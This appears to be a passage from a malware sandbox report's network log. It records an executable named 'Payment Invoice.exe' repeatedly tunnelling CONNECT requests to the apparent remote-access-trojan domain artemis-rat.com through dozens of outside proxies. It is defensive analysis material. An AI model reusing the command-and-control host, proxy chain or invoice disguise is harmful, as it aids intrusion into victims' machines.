                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1789192.168.2.455166211.93.2.19073027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.991960049 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:25.446049929 CET90INHTTP/1.1 200 OK
                                                                Content-Type: application/json
                                                                Connection: close
                                                                Content-Length: 55


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1790192.168.2.455064117.160.250.13288997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.992031097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.511343002 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1791192.168.2.454911103.76.12.5831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.996560097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1792192.168.2.45517527.96.235.171807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.001611948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1793192.168.2.455174103.23.100.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.002253056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1794192.168.2.454193162.144.36.208278297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.002763987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.003289938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.078851938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.089603901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.089306116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.089258909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.089263916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.089241028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1795192.168.2.453912117.160.250.134807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.002837896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.635880947 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1796192.168.2.45411382.223.121.72648717076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.003410101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1797192.168.2.455177103.216.49.23380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.024280071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1798192.168.2.45414579.110.201.23580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.072555065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1799192.168.2.45518194.177.106.17823247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.072674990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1800192.168.2.45514445.120.178.19710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.087747097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1801192.168.2.454158181.209.78.789997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.119973898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.123785973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.982180119 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1802192.168.2.454195138.2.73.15710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.122951031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1803192.168.2.451635171.22.108.18831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.139636040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.276735067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.781012058 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1804192.168.2.45428251.75.126.150365807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.149188995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.527025938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.027020931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.823934078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1805192.168.2.45165645.11.95.16552197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.149399996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1806192.168.2.45515385.239.121.16841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.149893999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1807192.168.2.45421943.255.113.232847076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.150218010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.504266024 CET208INHTTP/1.0 404 Not Found
                                                                Server: HCS
                                                                Date: Mon, 11 Mar 2024 18:02:47 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 432
                                                                HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                X-NGAA: MISS from CH-XW-NO1-315.4
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1808192.168.2.45518042.49.148.16790017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.150377989 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:25.612539053 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1809192.168.2.451790162.214.225.223550297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.150600910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1810192.168.2.45159046.98.192.23356787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.157989979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1811192.168.2.45164120.219.177.7331297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.164171934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.276844025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.314609051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1812192.168.2.451847162.241.46.6534777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.299643040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.323854923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.324002981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.323962927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.323580027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.325336933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.323788881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.323657036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:25.323674917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1813192.168.2.45175323.94.214.890547076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.305453062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.323889971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.323985100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.323956013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.323579073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.323612928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1814192.168.2.452009190.6.56.13380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.309490919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.649943113 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1815192.168.2.451710161.156.199.78807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.320878983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.323854923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.324002981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.323964119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.323997021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.325336933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.327533007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.323657036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
